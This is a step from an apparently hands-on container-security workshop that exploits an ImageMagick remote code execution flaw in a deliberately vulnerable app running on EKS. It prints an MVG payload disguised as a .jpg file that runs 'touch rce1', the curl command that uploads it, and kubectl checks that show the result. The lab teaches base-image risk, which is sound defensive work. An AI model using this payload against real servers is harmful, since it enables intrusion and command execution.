Step 4: Exploit a Container Vulnerability

Exploit a Container Vulnerability

Putting an application into a container does not automatically make it secure. To demonstrate the risks of a vulnerable component introduced by our container base image, we will exploit a vulnerability in the ImageMagick package present in one of the pods of our running application on EKS.

Check the application container’s home directory

List the current files in the container’s home directory

First we will get a file directory listing for the container running in that pod by executing the following command:

kubectl exec -it $(kubectl get pod -l app=goof-image,tier=frontend -o name) -- ls 

You should see the file listing of the goof-image container’s home directory as follows:

CODEOWNERS  node_modules	  package.json	server.js
Dockerfile  exploits   package-lock.json  public	uploads

Exploit a remote code execution vulnerability

In your Cloud9 terminal run the following:

cat image-app/exploits/rce1.jpg

Even though that file has a .jpg extension in it’s name, it is actually a script:

push graphic-context
viewbox 0 0 640 480
fill 'url("|touch "rce1)'
pop graphic-context

Take special notice to the "|touch "rce1 part of the next-to-last line.

Now, run the following:

curl -F 'twitter_picture=@image-app/exploits/rce1.jpg' http://$GOOF_IMAGE_LB:3112/upload/

All we see coming back is this:

Found. Redirecting to /public/result.html

But let’s check the container’s filesystem again:

kubectl exec -it $(kubectl get pod -l app=goof-image,tier=frontend -o name) -- ls 
CODEOWNERS  node_modules	  package.json	rce1	   uploads
Dockerfile  exploits   package-lock.json  public	server.js

Now we see an additional rce1 file has been created!

The impact of this vulnerability

The creation of an empty file may not seem that severe but realize that any command availabile in that container could be used in place of the touch command used here. This includes things like wget, curl and apt-get. It would not be hard to craft an exploit that pulls a shell script from an internet site and runs whatever is in it, giving the hacker a beachhead in your cluster to operate from.

Continue to the next step to learn how to identify these, and other, vulnerabilities in your container images that are introduced by your container base image.